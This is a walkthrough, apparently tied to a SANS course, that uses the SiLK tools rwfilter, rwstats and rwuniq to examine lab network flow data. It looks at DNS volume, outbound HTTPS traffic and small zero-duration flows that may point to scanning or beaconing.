<p></p><p>Find the top 5 DNS Servers seen within the flows using <b><i>rwfilter </i></b>and <b><i>rwstats</i></b>.<br />Interesting that a public DNS server is seen as the device with highest number of packets. I was expecting to see an internal DNS server. Then again, it could be the location of this sensor.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=in --sport=53 | rwstats --values=packets \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields sIP --count=5 --ipv6-policy=ignore</b></span>
<span style="color: white;">INPUT: 1215737 Records for 276 Bins and 1348651 Total Packets</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Packets</span>
<span style="color: white;"> sIP| Packets| %Packets| cumul_%|</span>
<span style="color: white;"> 8.8.8.8| 1330414| 98.647760| 98.647760|</span>
<span style="color: white;"> 199.212.0.63| 9296| 0.689281| 99.337041|</span>
<span style="color: white;"> 199.180.180.63| 2011| 0.149112| 99.486153|</span>
<span style="color: white;"> 204.61.216.50| 1272| 0.094316| 99.580470|</span>
<span style="color: white;"> 205.251.199.83| 586| 0.043451| 99.623920|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Looking at the DNS communication from the bytes perspective using <b><i>rwfilter </i></b>and <b><i>rwstats.</i></b></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=in --sport=53 | rwstats --values=bytes \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields sIP --count=5 --ipv6-policy=ignore</b></span>
<span style="color: white;">INPUT: 1215737 Records for 276 Bins and 212797321 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 8.8.8.8| 209509379| 98.454895| 98.454895|</span>
<span style="color: white;"> 199.212.0.63| 758309| 0.356353| 98.811248|</span>
<span style="color: white;"> 199.180.180.63| 710009| 0.333655| 99.144903|</span>
<span style="color: white;"> 204.61.216.50| 449465| 0.211217| 99.356120|</span>
<span style="color: white;"> 193.0.9.10| 205880| 0.096749| 99.452870|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Looking at it from the number of records packets using <b><i>rwfilter </i></b>and <b><i>rwstats.</i></b></p><p><b><i><!--HTML generated using hilite.me--></i></b></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=in --sport=53 | rwstats --values=records \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields sIP --count=5 --ipv6-policy=ignore</b></span>
<span style="color: white;">INPUT: 1215737 Records for 276 Bins and 1215737 Total Records</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Records</span>
<span style="color: white;"> sIP| Records| %Records| cumul_%|</span>
<span style="color: white;"> 8.8.8.8| 1200021| 98.707286| 98.707286|</span>
<span style="color: white;"> 199.212.0.63| 7931| 0.652361| 99.359648|</span>
<span style="color: white;"> 199.180.180.63| 2008| 0.165167| 99.524815|</span>
<span style="color: white;"> 204.61.216.50| 1271| 0.104546| 99.629361|</span>
<span style="color: white;"> 193.0.9.10| 581| 0.047790| 99.677151|</span>
</pre></td></tr></tbody></table></div><b><i>
</i></b><p></p><p>Above relates to traffic coming in the enterprise. What about traffic going out to DNS Servers?</p><p>Looking at it from a different perspective using <b><i>rwfilter </i></b>and <b><i>rwstats.</i></b></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=out,outweb --dport=53 | rwstats --values=bytes \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields sIP --count=5 --ipv6-policy=ignore</b></span>
<span style="color: white;">INPUT: 1225733 Records for 10 Bins and 110746579 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 172.28.10.137| 110716457| 99.972801| 99.972801|</span>
<span style="color: white;"> 172.28.30.2| 13824| 0.012483| 99.985284|</span>
<span style="color: white;"> 172.28.20.3| 12528| 0.011312| 99.996596|</span>
<span style="color: white;"> 172.28.20.5| 960| 0.000867| 99.997463|</span>
<span style="color: white;"> 172.28.30.5| 680| 0.000614| 99.998077|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>The number of flow records using <b><i>rwfilter </i></b>and <b><i>rwstats.</i></b></p><p><b><i><!--HTML generated using hilite.me--></i></b></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=17 --pass=stdout --type=out,outweb --dport=53</span></b></span><b><span style="color: #fcff01;">
<span> | rwstats --values=records --fields sIP --count=5 --ipv6-policy=ignore</span></span></b>
<span style="color: white;">INPUT: 1225733 Records for 10 Bins and 1225733 Total Records</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Records</span>
<span style="color: white;"> sIP| Records| %Records| cumul_%|</span>
<span style="color: white;"> 172.28.10.137| 1225669| 99.994779| 99.994779|</span>
<span style="color: white;"> 172.28.30.2| 29| 0.002366| 99.997145|</span>
<span style="color: white;"> 172.28.20.3| 24| 0.001958| 99.999103|</span>
<span style="color: white;"> 172.28.10.89| 3| 0.000245| 99.999347|</span>
<span style="color: white;"> 172.28.30.5| 2| 0.000163| 99.999510|</span>
</pre></td></tr></tbody></table></div><b><i>
</i></b><p></p><p>Digging deeper to see what the host at <i>172.28.10.137</i> is doing, using <b><i>rwfilter </i></b>and <b><i>rwstats</i></b></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=out,outweb --dport=53 | rwstats --values=bytes \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields sIP,dip,dport --count=5 --ipv6-policy=ignore</b></span>
<span style="color: white;">INPUT: 1225733 Records for 359 Bins and 110746579 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| dIP|dPort| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 172.28.10.137| 8.8.8.8| 53| 108039369| 97.555491| 97.555491|</span>
<span style="color: white;"> 172.28.10.137| 199.212.0.63| 53| 1382580| 1.248418| 98.803909|</span>
<span style="color: white;"> 172.28.10.137| 192.175.48.6| 53| 300216| 0.271084| 99.074993|</span>
<span style="color: white;"> 172.28.10.137| 192.175.48.42| 53| 299097| 0.270073| 99.345066|</span>
<span style="color: white;"> 172.28.10.137| 199.180.180.63| 53| 153126| 0.138267| 99.483333|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>What's your conclusion of above?</p><p>What sensor is this traffic coming from? Using <b><i>rwfilter </i></b>and <b><i>rwstats</i></b></p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ </span><span style="color: #fcff01;"><b>rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 </b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=out,outweb --dport=53 | rwstats --values=records \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields sensor --count=5 --ipv6-policy=ignore --no-percent</b></span>
<span style="color: white;">INPUT: 1225733 Records for 1 Bin and 1225733 Total Records</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Records</span>
<span style="color: white;"> sensor| Records|</span>
<span style="color: white;"> Internal| 1225733|</span>
</pre></td></tr></tbody></table></div>
</div><p>Looking at it from a different perspective via <b><i>rwfilter</i></b> and <b><i>rwuniq</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=out,outweb --dport=53 | rwuniq --values=flows \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields=sensor</b></span>
<span style="color: white;"> sensor| Records|</span>
<span style="color: white;"> Internal| 1225733|</span>
</pre></td></tr></tbody></table></div>
<p></p>Looking at the address 172.28.10.137 to identify all communication. Find the combination of unique source and destination IP and source and destination ports. Sort the results. Doing this once again, via <b><i>rwfilter</i></b> and <b><i>rwuniq</i></b>.<p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=0- --pass=stdout --type=all --any-address=172.28.10.137 | \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwuniq --values=flows,distinct:sip,distinct:dip,distinct:sport,distinct:dport \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields type,protocol --sort</b></span>
<span style="color: white;"> type|pro| Records| sIP-Distinct| dIP-Distinct|sPort|dPort|</span>
<span style="color: white;"> in| 1| 160| 8| 1| 1| 1|</span>
<span style="color: white;"> in| 6| 408473| 8| 1|21465|65477|</span>
<span style="color: white;"> in| 8| 1| 1| 1| 1| 1|</span>
<span style="color: white;"> in| 17| 1245841| 280| 1| 279|14462|</span>
<span style="color: white;"> in| 63| 1| 1| 1| 1| 1|</span>
<span style="color: white;"> out| 1| 139| 1| 8| 1| 1|</span>
<span style="color: white;"> out| 6| 12106| 1| 8| 21| 9732|</span>
<span style="color: white;"> out| 17| 1230067| 1| 355| 8708| 99|</span>
<span style="color: white;"> inweb| 6| 10791| 294| 1| 185| 7857|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Finding the top 3 unique destination ports for traffic going outbound using <b><i>rwfilter</i></b> and <b><i>rwuniq</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=0- --pass=stdout --type=out,outweb | rwstats --value=flows \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields=dport --count=3</b></span>
<span style="color: white;">INPUT: 1894243 Records for 31811 Bins and 1894243 Total Records</span>
<span style="color: white;">OUTPUT: Top 3 Bins by Records</span>
<span style="color: white;">dPort| Records| %Records| cumul_%|</span>
<span style="color: white;"> 53| 1225733| 64.708329| 64.708329|</span>
<span style="color: white;"> 443| 120219| 6.346546| 71.054875|</span>
<span style="color: white;"> 9573| 9755| 0.514981| 71.569857|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Since I've done some work with port 53 above, let's look at port 443.</p><p>Find the top 5 source IP communicating via port 443 with traffic greater than 250 bytes in their flows. Note the <b><i>rwfilter</i></b> <i>--bytes-per-packet=250-.</i> Once again, using <b><i>rwfilter </i></b>and <b><i>rwstats</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=0- --pass=stdout --type=out,outweb --dport=443 --bytes-per-packet=250- | \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwstats --value=bytes --fields=sip --count=5 --ipv6-policy=ignore</b></span>
<span style="color: white;">INPUT: 120213 Records for 10 Bins and 691383585 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 172.28.20.6| 130274858| 18.842631| 18.842631|</span>
<span style="color: white;"> 172.28.30.5| 114087108| 16.501275| 35.343906|</span>
<span style="color: white;"> 172.28.30.2| 104686092| 15.141536| 50.485442|</span>
<span style="color: white;"> 172.28.30.3| 90222518| 13.049560| 63.535002|</span>
<span style="color: white;"> 172.28.20.3| 72788328| 10.527922| 74.062925|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Looking at flow records with 0-250 bytes per packet. Note the <b><i>rwfilter</i></b> <i>--bytes-per-packet=0-250.</i> Adding the duration to this activity. Interesting this activity all have 0 time. Scanning?</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=0- --pass=stdout --type=out,outweb --dport=443 --bytes-per-packet=0-250 | \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwstats --value=bytes --fields=sip,dip,sport,dport,packets,duration --count=5 \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><b><span style="color: #fcff01;"><span>--ipv6-policy=ignore --no-</span><span>percent</span></span></b>
<span style="color: white;">INPUT: 6 Records for 6 Bins and 744 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| dIP|sPort|dPort| packets|durat| Bytes|</span>
<span style="color: white;"> 172.28.30.4| 23.58.146.215|57496| 443| 1| 0| 124|</span>
<span style="color: white;"> 172.28.30.3| 23.58.146.216|65523| 443| 1| 0| 124|</span>
<span style="color: white;"> 172.28.30.3| 23.58.146.216|56311| 443| 1| 0| 124|</span>
<span style="color: white;"> 172.28.20.6| 23.58.146.215|49308| 443| 1| 0| 124|</span>
<span style="color: white;"> 172.28.30.4| 184.51.157.69|58644| 443| 1| 0| 124|</span>
</pre></td></tr></tbody></table></div>
<br />Find flows where the duration is 0 and the bytes-per-packet is less than 250 using <b><i>rwfilter </i></b>and <b><i>rwstats</i></b>.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=0- --pass=stdout \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--type=out,outweb --dport=443 --bytes-per-packet=0-250 --duration=0 | rwstats --value=bytes \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields=stime,sip,dip,sport,dport,packets,duration --count=5 --ipv6-policy=ignore --no-percent --bin=3600</b></span>
<span style="color: white;">INPUT: 6 Records for 6 Bins and 744 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sTime| sIP| dIP|sPort|dPort| packets|durat| Bytes|</span>
<span style="color: white;">2022/02/18T18:00:00| 172.28.20.6| 23.58.146.215|49308| 443| 1| 0| 124|</span>
<span style="color: white;">2022/02/17T17:00:00| 172.28.20.6| 23.58.146.216|56289| 443| 1| 0| 124|</span>
<span style="color: white;">2022/03/24T15:00:00| 172.28.30.4| 184.51.157.69|58644| 443| 1| 0| 124|</span>
<span style="color: white;">2022/03/04T17:00:00| 172.28.30.3| 23.58.146.216|56311| 443| 1| 0| 124|</span>
<span style="color: white;">2022/03/06T21:00:00| 172.28.30.3| 23.58.146.216|65523| 443| 1| 0| 124|</span>
</pre></td></tr></tbody></table></div>
<div><br />Add the type column to validate the direction of the traffic. Still using <b><i>rwfilter</i></b> and <b><i>rwstats</i></b>.</div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=0- --pass=stdout --type=out,outweb \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--dport=443 --bytes-per-packet=0-250 --duration=0 | rwstats --value=bytes --fields=stime,sip,dip,sport,dport,packets,duration,type \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--count</span></b></span><b><span style="color: #fcff01;"><span>=5 --ipv6-policy=ignore --no-percent --bin=3600</span></span></b>
<span style="color: white;">INPUT: 6 Records for 6 Bins and 744 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sTime| sIP| dIP|sPort|dPort| packets|durat| type| Bytes|</span>
<span style="color: white;">2022/03/04T17:00:00| 172.28.30.3| 23.58.146.216|56311| 443| 1| 0| out| 124|</span>
<span style="color: white;">2022/03/24T15:00:00| 172.28.30.4| 184.51.157.69|58644| 443| 1| 0| out| 124|</span>
<span style="color: white;">2022/02/17T17:00:00| 172.28.20.6| 23.58.146.216|56289| 443| 1| 0| out| 124|</span>
<span style="color: white;">2022/02/18T18:00:00| 172.28.20.6| 23.58.146.215|49308| 443| 1| 0| out| 124|</span>
<span style="color: white;">2022/03/06T21:00:00| 172.28.30.3| 23.58.146.216|65523| 443| 1| 0| out| 124|</span>
</pre></td></tr></tbody></table></div>
<br />Do we have similar traffic on the inside? Removing the <i>type</i> from <b><i>rwfilter</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=0- --pass=stdout --dport=443 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--bytes-per-packet=0-250 --duration=0 | rwstats --value=bytes --fields=stime,sip,dip,sport,dport,packets,duration,type \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--count=5 --ipv6-policy=ignore --no-percent --bin=3600</span></b></span>
<span style="color: white;">INPUT: 147455 Records for 147297 Bins and 92351786 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sTime| sIP| dIP|sPort|dPort| packets|durat| type| Bytes|</span>
<span style="color: white;">2022/03/17T21:00:00| 10.200.223.2| 172.28.3.173|34796| 443| 32| 0| inweb| 1920|</span>
<span style="color: white;">2022/03/17T21:00:00| 10.200.223.2| 172.28.2.183|54576| 443| 32| 0| inweb| 1920|</span>
<span style="color: white;">2022/03/17T21:00:00| 10.200.223.2| 172.28.14.48|33192| 443| 32| 0| inweb| 1920|</span>
<span style="color: white;">2022/03/17T21:00:00| 10.200.223.2| 172.28.12.198|58278| 443| 32| 0| inweb| 1920|</span>
<span style="color: white;">2022/03/17T21:00:00| 10.200.223.2| 172.28.14.69|48240| 443| 32| 0| inweb| 1920|</span>
</pre></td></tr></tbody></table></div>
<br />Taking a different view. Looking for smaller outbound transfers. Note the <i>--type=out,outweb</i>. Maybe beaconing? We also talk about detecting beaconing in <a href="https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/" target="_blank">SANS SEC595: Applied Data Science and AI/Machine Learning for Cybersecurity Professionals</a> using Fast Fourier Transform. The bytes below are all consistent for the 3 unique hosts.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=0- --pass=stdout --type=out,outweb --dport=443 --bytes-per-packet=0-250 | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwstats --value=bytes --fields=sip --count=5 --ipv6-policy=ignore</span></b></span>
<span style="color: white;">INPUT: 6 Records for 3 Bins and 744 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 172.28.20.6| 248| 33.333333| 33.333333|</span>
<span style="color: white;"> 172.28.30.4| 248| 33.333333| 66.666667|</span>
<span style="color: white;"> 172.28.30.3| 248| 33.333333|100.000000|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Get some additional protocol statistics via <b><i>rwfilter</i></b> and <b><i>rwstats</i></b>. Note the <i>--print-statistics </i>for <b><i>rwfilter</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=0- --pass=stdout --type=out,outweb --dport=443 --bytes-per-packet=0-250 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--print-statistics | rwstats --value=bytes --fields=sip --count=5 --ipv6-policy=ignore \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--detail-proto-stat</span></b></span>
<span style="color: white;">s=6 | grep "min"</span>
<span style="color: white;">Files 1235. Read 1894243. Pass 6. Fail 1894237.</span>
<span style="color: white;">*BYTES min 124; max 124</span>
<span style="color: white;">*PACKETS min 1; max 1</span>
<span style="color: white;">*BYTES/PACKET min 124; max 124</span>
</pre></td></tr></tbody></table></div>
<br />Revisiting the source IPs with low byte count. What destination are they communicating with? Adding the destination field to <b><i>rwstats</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=0- --pass=stdout --type=out,outweb --dport=443 --bytes-per-packet=0-250 | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwstats --value=bytes --fields=sip,dip,sport,dport,packets --count=5 --ipv6-policy=ignore \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--no-percent</span></b></span>
<span style="color: white;">INPUT: 6 Records for 6 Bins and 744 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| dIP|sPort|dPort| packets| Bytes|</span>
<span style="color: white;"> 172.28.20.6| 23.58.146.216|56289| 443| 1| 124|</span>
<span style="color: white;"> 172.28.30.3| 23.58.146.216|56311| 443| 1| 124|</span>
